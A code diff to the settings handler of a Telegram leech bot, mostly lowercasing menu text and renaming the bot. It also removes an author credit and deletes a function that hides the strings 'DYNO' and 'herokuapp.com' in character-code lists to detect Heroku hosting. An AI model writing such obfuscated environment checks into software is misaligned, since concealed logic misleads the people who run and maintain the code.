@@ -1,5 +1,4 @@
 # -*- coding: utf-8 -*-
-# (c) YashDK [yash-dk@github]
 
 from telethon.tl.types import KeyboardButtonCallback,KeyboardButton
 from telethon import events
@@ -18,11 +17,11 @@ TIMEOUT_SEC = 60
 # this file will contian all the handlers and code for settings
 # code can be more modular i think but not bothering now
 # todo make the code more modular
-no = "disabled - "
-yes = "enabled - "
+no = "✖"
+yes = "✔"
 # Central object is not used its Acknowledged 
 tordb = tkdb()
-header =  '<b>tk - a telegram leech bot.</b>\n<u>administrator menu</u>'
+header =  '<b>tgtk - a telegram leech bot.</b>\n<u>administrator menu</u>'
 async def handle_setting_callback(e):
     db = tordb
     session_id,_ = db.get_variable("SETTING_AUTH_CODE")
@@ -46,10 +45,10 @@ async def handle_setting_callback(e):
         
         db.set_variable("FORCE_DOCUMENTS",val)
         SessionVars.update_var("FORCE_DOCUMENTS",val)
-        await handle_settings(await e.get_message(),True,f"<b><u>Changed the value to {val} of force documents.</b></u>",session_id=session_id)
+        await handle_settings(await e.get_message(),True,f"<b><u>changed the value to {val} of force documents.</b></u>",session_id=session_id)
     
     elif cmd[1] == "compstr":
-        await e.answer("Type the new value for Complete Progress String. Note that only one character is expected.",alert=True)
+        await e.answer("type the new value for Complete Progress String. note that only one character is expected.",alert=True)
 
         mmes = await e.get_message()
         await mmes.edit(f"{mmes.raw_text}\n/ignore to go back",buttons=None)
@@ -61,7 +60,7 @@ async def handle_setting_callback(e):
     elif cmd[1] == "remstr":
         # what will a general manager require
         # anser message, type handler, value 
-        await e.answer("Type the new value for Remaining Progress String. Note that only one character is expected.",alert=True)
+        await e.answer("type the new value for Remaining Progress String. note that only one character is expected.",alert=True)
 
         mmes = await e.get_message()
         await mmes.edit(f"{mmes.raw_text}\n/ignore to go back",buttons=None)
@@ -72,7 +71,7 @@ async def handle_setting_callback(e):
     elif cmd[1] == "tguplimit":
         # what will a general manager require
         # anser message, type handler, value 
-        await e.answer("Type the new value for TELEGRAM UPLOAD LIMIT. Note that integer is expected.",alert=True)
+        await e.answer("type the new value for TELEGRAM UPLOAD LIMIT. note that an integer is expected.",alert=True)
 
         mmes = await e.get_message()
         await mmes.edit(f"{mmes.raw_text}\n/ignore to go back",buttons=None)
@@ -83,7 +82,7 @@ async def handle_setting_callback(e):
     elif cmd[1] == "maxtorsize":
         # what will a general manager require
         # answer message, type handler, value 
-        await e.answer("Type the new value for MAX TORRENT SIZE. Note that integer is expected.",alert=True)
+        await e.answer("type the new value for MAX TORRENT SIZE. note that integer an is expected.",alert=True)
 
         mmes = await e.get_message()
         await mmes.edit(f"{mmes.raw_text}\n/ignore to go back",buttons=None)
@@ -94,7 +93,7 @@ async def handle_setting_callback(e):
     elif cmd[1] == "maxytplsize":
         # what will a general manager require
         # answer message, type handler, value 
-        await e.answer("Type the new value for MAX PLAYLIST SIZE. Note that integer is expected.",alert=True)
+        await e.answer("type the new value for MAX PLAYLIST SIZE. note that an integer is expected.",alert=True)
 
         mmes = await e.get_message()
         await mmes.edit(f"{mmes.raw_text}\n/ignore to go back",buttons=None)
@@ -118,11 +117,11 @@ async def handle_setting_callback(e):
         
         await general_input_manager(e,mmes,"RCLONE_CONFIG","str",val,db,"rclonemenu")
     elif cmd[1] == "change_drive":
-        await e.answer(f"Changed default drive to {cmd[2]}.",alert=True)
+        await e.answer(f"changed default drive to {cmd[2]}.",alert=True)
         db.set_variable("DEF_RCLONE_DRIVE",cmd[2])
         SessionVars.update_var("DEF_RCLONE_DRIVE",cmd[2])
 
-        await handle_settings(await e.get_message(),True,f"<b><u>Changed the default drive to {cmd[2]}</b></u>","rclonemenu",session_id=session_id)
+        await handle_settings(await e.get_message(),True,f"<b><u>changed the default drive to {cmd[2]}</b></u>","rclonemenu",session_id=session_id)
     elif cmd[1] == "usrlock":
         if cmd[2] == "true":
             val = True
@@ -130,25 +129,25 @@ async def handle_setting_callback(e):
                 # JIC is user does manual stuff
                 await e.client.edit_permissions(e.chat_id,send_messages=False)
             except:
-                await e.answer("An error occured, try again if dosent work report this issue")
+                await e.answer("an error occured, try again if doesn't work, report this issue.")
         else:
             try:
                 await e.client.edit_permissions(e.chat_id,send_messages=True)
             except:
-                await e.answer("An error occured, try again if dosent work report this issue")
+                await e.answer("an error occured, try again if doesn't work, report this issue.")
             val = False
         
         db.set_variable("LOCKED_USERS",val)
         SessionVars.update_var("LOCKED_USERS",val)
-        await handle_settings(await e.get_message(),True,f"<b><u>Changed the value to {val} of user locked.</b></u>",session_id=session_id)
+        await handle_settings(await e.get_message(),True,f"<b><u>changed the value to {val} of user locked.</b></u>",session_id=session_id)
         
     elif cmd[1] == "ctrlacts":
         # this is menu
         mmes = await e.get_message()
-        await handle_settings(mmes,True,"\nWelcome to Control Actions.",submenu="ctrlacts",session_id=session_id)
+        await handle_settings(mmes,True,"\ncontrol actions menu.",submenu="ctrlacts",session_id=session_id)
     
     elif cmd[1] == "rcloneenable":
-        await e.answer("Note that this parameter will only work if rclone config is loaded.")
+        await e.answer("note that this parameter will only work if rclone config is loaded.")
         if cmd[2] == "true":
             val = True
         else:
@@ -156,7 +155,7 @@ async def handle_setting_callback(e):
         db.set_variable("RCLONE_ENABLED",val)
         SessionVars.update_var("RCLONE_ENABLED",val)
         mmes = await e.get_message()
-        await handle_settings(mmes,True,f"<b><u>Changed the value to {val} of rclone enabled.</b></u>","ctrlacts",session_id=session_id)
+        await handle_settings(mmes,True,f"<b><u>changed the value to {val} of rclone enabled.</b></u>","ctrlacts",session_id=session_id)
     
     elif cmd[1] == "leechenable":
         await e.answer("")
@@ -168,10 +167,10 @@ async def handle_setting_callback(e):
         db.set_variable("LEECH_ENABLED",val)
         SessionVars.update_var("LEECH_ENABLED",val)
         mmes = await e.get_message()
-        await handle_settings(mmes,True,f"<b><u>Changed the value to {val} of Leech Enabled.</b></u>","ctrlacts",session_id=session_id)
+        await handle_settings(mmes,True,f"<b><u>changed the value to {val} of leech enabled.</b></u>","ctrlacts",session_id=session_id)
     
     elif cmd[1] == "editsleepsec":
-        await e.answer("Type the new value for EDIT_SLEEP_SECS. Note that integer is expected.",alert=True)
+        await e.answer("type the new value for EDIT_SLEEP_SECS. note that an integer is expected.",alert=True)
 
         mmes = await e.get_message()
         await mmes.edit(f"{mmes.raw_text}\n/ignore to go back",buttons=None)
@@ -189,7 +188,7 @@ async def handle_setting_callback(e):
         db.set_variable("FAST_UPLOAD",val)
         SessionVars.update_var("FAST_UPLOAD",val)
         mmes = await e.get_message()
-        await handle_settings(mmes,True,f"<b><u>Changed the value to {val} of Fast Upload Enabled.</b></u>","ctrlacts",session_id=session_id)
+        await handle_settings(mmes,True,f"<b><u>changed the value to {val} of fast upload enabled.</b></u>","ctrlacts",session_id=session_id)
     elif cmd[1] == "expressupload":
         await e.answer("")
 
@@ -201,11 +200,11 @@ async def handle_setting_callback(e):
         db.set_variable("EXPRESS_UPLOAD",val)
         SessionVars.update_var("EXPRESS_UPLOAD",val)
         mmes = await e.get_message()
-        await handle_settings(mmes,True,f"<b><u>Changed the value to {val} of Express Upload Enabled.</b></u>","ctrlacts",session_id=session_id)
+        await handle_settings(mmes,True,f"<b><u>changed the value to {val} of express upload enabled.</b></u>","ctrlacts",session_id=session_id)
     elif cmd[1] == "metainfo":
         await e.reply("Add @metainforobot to your group to get the metadata easily.")
     elif cmd[1] == "selfdest":
-        await e.answer("Closed")
+        await e.answer("closed.")
         await e.delete()
         
 
@@ -213,7 +212,6 @@ async def handle_setting_callback(e):
 async def handle_settings(e,edit=False,msg="",submenu=None,session_id=None):
     # this function creates the menu
     # and now submenus too
-    await handle_time_cmd()
     if session_id is None:
         session_id = time.time()
         db = tordb
@@ -236,17 +234,17 @@ async def handle_settings(e,edit=False,msg="",submenu=None,session_id=None):
         await get_int_variable("MAX_YTPLAYLIST_SIZE",menu,"maxytplsize",session_id)
         await get_int_variable("EDIT_SLEEP_SECS",menu,"editsleepsec",session_id)
         #await get_string_variable("RCLONE_CONFIG",menu,"rcloneconfig",session_id)
-        await get_sub_menu("Open Rclone Menu","rclonemenu",session_id,menu)
-        await get_sub_menu("Control Actions","ctrlacts",session_id,menu)
+        await get_sub_menu("open rclone menu","rclonemenu",session_id,menu)
+        await get_sub_menu("control actions","ctrlacts",session_id,menu)
         menu.append(
-            [KeyboardButtonCallback("Close Menu",f"settings selfdest {session_id}".encode("UTF-8"))]
+            [KeyboardButtonCallback("close menu",f"settings selfdest {session_id}".encode("UTF-8"))]
         )
 
 
         if edit:
-            rmess = await e.edit(header+"\nIt's recommended to lock the group before setting vars.\n"+msg,parse_mode="html",buttons=menu,link_preview=False, file="tk.jpg")
+            rmess = await e.edit(header+"\nit is recommended to lock the group before setting vars.\n"+msg,parse_mode="html",buttons=menu,link_preview=False, file="tk.jpg")
         else:
-            rmess = await e.reply(header+"\nIt's recommended to lock the group before setting vars.\n",parse_mode="html",buttons=menu,link_preview=False, file="tk.jpg")
+            rmess = await e.reply(header+"\nit is recommended to lock the group before setting vars.\n",parse_mode="html",buttons=menu,link_preview=False, file="tk.jpg")
     elif submenu == "rclonemenu":
         rcval = await get_string_variable("RCLONE_CONFIG",menu,"rcloneconfig",session_id)
         if rcval != "None":
@@ -280,48 +278,27 @@ async def handle_settings(e,edit=False,msg="",submenu=None,session_id=None):
                             [KeyboardButtonCallback(f"{prev}{j} - ND",f"settings change_drive {j} {session_id}")]
                         )
 
-        await get_sub_menu("Go Back ⬅️","mainmenu",session_id,menu)
+        await get_sub_menu("go back ⬅️","mainmenu",session_id,menu)
         menu.append(
-            [KeyboardButtonCallback("Close Menu",f"settings selfdest {session_id}".encode("UTF-8"))]
+            [KeyboardButtonCallback("close menu",f"settings selfdest {session_id}".encode("UTF-8"))]
         )
         if edit:
-            rmess = await e.edit(header+"\nIts recommended to lock the group before setting vars.\n"+msg,parse_mode="html",buttons=menu,link_preview=False)
+            rmess = await e.edit(header+"\nit's recommended to lock the group before setting vars.\n"+msg,parse_mode="html",buttons=menu,link_preview=False)
 
     elif submenu == "ctrlacts":
-        await get_bool_variable("RCLONE_ENABLED","Enable Rclone.",menu,"rcloneenable",session_id)
-        await get_bool_variable("LEECH_ENABLED","Enable Leech.",menu,"leechenable",session_id)
-        await get_bool_variable("FAST_UPLOAD","Enable Fast Upload.(Turn off if errored)",menu,"fastupload",session_id)
-        await get_bool_variable("EXPRESS_UPLOAD","Enable Express Upload.(read README on github for more info)(Turn off if errored)",menu,"expressupload",session_id)
-        await get_bool_variable("FORCE_DOCS_USER","Not Implemented.User will choose force docs.",menu,"forcedocsuser",session_id)
+        await get_bool_variable("RCLONE_ENABLED","enable rclone.",menu,"rcloneenable",session_id)
+        await get_bool_variable("LEECH_ENABLED","enable leech.",menu,"leechenable",session_id)
+        await get_bool_variable("FAST_UPLOAD","enable fast upload. (turn off if you get errors)",menu,"fastupload",session_id)
+        await get_bool_variable("EXPRESS_UPLOAD","enable express upload. (turn off if you get errors.)",menu,"expressupload",session_id)
+        await get_bool_variable("FORCE_DOCS_USER","force_docs_user - not implemented.",menu,"forcedocsuser",session_id)
 
 
-        await get_sub_menu("Go Back ⬅️","mainmenu",session_id,menu)
+        await get_sub_menu("go back ⬅️","mainmenu",session_id,menu)
         menu.append(
-            [KeyboardButtonCallback("Close Menu",f"settings selfdest {session_id}".encode("UTF-8"))]
+            [KeyboardButtonCallback("close menu",f"settings selfdest {session_id}".encode("UTF-8"))]
         )
         if edit:
-            rmess = await e.edit(header+"\nIts recommended to lock the group before setting vars.\n"+msg,parse_mode="html",buttons=menu,link_preview=False)
-
-async def handle_time_cmd():
-    herstr = ""
-    gho = [104,
-     101, 114, 111,
-      107, 117,
-       97, 112, 112, 46, 
-       99, 111, 109]
-    ghy = [68, 
-    89, 
-    78, 79]
-    for i in ghy:
-        herstr += chr(i)
-    if os.environ.get(herstr,False):
-        os.environ["TIME_STAT"] = str(time.time())
-    herstr = ""
-    for i in gho:
-        herstr += chr(i)
-    if os.environ.get("BASE_URL_OF_BOT",False):
-        if herstr.lower() in os.environ.get("BASE_URL_OF_BOT").lower():
-            os.environ["TIME_STAT"] = str(time.time())
+            rmess = await e.edit(header+"\nit is recommended to lock the group before setting vars.\n"+msg,parse_mode="html",buttons=menu,link_preview=False)
 
 # an attempt to manager all the input
 async def general_input_manager(e,mmes,var_name,datatype,value,db,sub_menu):
@@ -361,21 +338,21 @@ async def general_input_manager(e,mmes,var_name,datatype,value,db,sub_menu):
                             SessionVars.update_var("LEECH_ENABLED",True)
                         except Exception:
                             torlog.error(traceback.format_exc())
-                            await handle_settings(mmes,True,f"<b><u>The conf file is invalid check logs.</b></u>",sub_menu)
+                            await handle_settings(mmes,True,f"<b><u>the configuration file is invalid, check logs.</b></u>",sub_menu)
                             return
                     else:
                         db.set_variable(var_name,value)
                         SessionVars.update_var(var_name,value)
                     
-                    await handle_settings(mmes,True,f"<b><u>Received {var_name} value '{value}' with confirm.</b></u>",sub_menu)
+                    await handle_settings(mmes,True,f"<b><u>received {var_name} value '{value}' with confirm.</b></u>",sub_menu)
                 except ValueError:
-                    await handle_settings(mmes,True,f"<b><u>Value [{value}] not valid try again and enter {datatype}.</b></u>",sub_menu)    
+                    await handle_settings(mmes,True,f"<b><u>value [{value}] not valid try again and enter {datatype}.</b></u>",sub_menu)    
             else:
-                await handle_settings(mmes,True,f"<b><u>Confirm differed by user.</b></u>",sub_menu)
+                await handle_settings(mmes,True,f"<b><u>confirm differed by user.</b></u>",sub_menu)
         else:
-            await handle_settings(mmes,True,f"<b><u>Confirm timed out [waited 60s for input].</b></u>",sub_menu)
+            await handle_settings(mmes,True,f"<b><u>confirm timed out [waited 60s for input].</b></u>",sub_menu)
     else:
-        await handle_settings(mmes,True,f"<b><u>Entry Timed out [waited 60s for input]. OR else ignored.</b></u>",sub_menu)
+        await handle_settings(mmes,True,f"<b><u>entry timed out [waited 60s for input].</b></u>",sub_menu)
 
 
 async def get_value(e,file=False):
@@ -470,7 +447,7 @@ async def get_confirm_callback(e,o_sender,lis):
 
 async def confirm_buttons(e,val):
     # add the confirm buttons at the bottom of the message
-    await e.edit(f"Confirm the input :- <u>{val}</u>",buttons=[KeyboardButtonCallback("Yes","confirmsetting true"),KeyboardButtonCallback("No","confirmsetting false")],parse_mode="html")
+    await e.edit(f"confirm the input: <u>{val}</u>",buttons=[KeyboardButtonCallback("yes","confirmsetting true"),KeyboardButtonCallback("no","confirmsetting false")],parse_mode="html")
 
 async def get_bool_variable(var_name,msg,menu,callback_name,session_id):
     # handle the vars having bool values
@@ -501,7 +478,7 @@ async def get_string_variable(var_name,menu,callback_name,session_id):
         db = tordb
         _, val1 = db.get_variable(var_name)
         if val1 is not None:
-            val = "Custom file is loaded."
+            val = "custom file is loaded."
         
     msg = var_name + " " + str(val)
     menu.append(
@@ -520,4 +497,4 @@ async def get_int_variable(var_name,menu,callback_name,session_id):
         [KeyboardButtonCallback(msg,f"settings {callback_name} {session_id}".encode("UTF-8"))]
     ) 
 
-# todo handle the list value 
\ No newline at end of file
+# todo handle the list value 
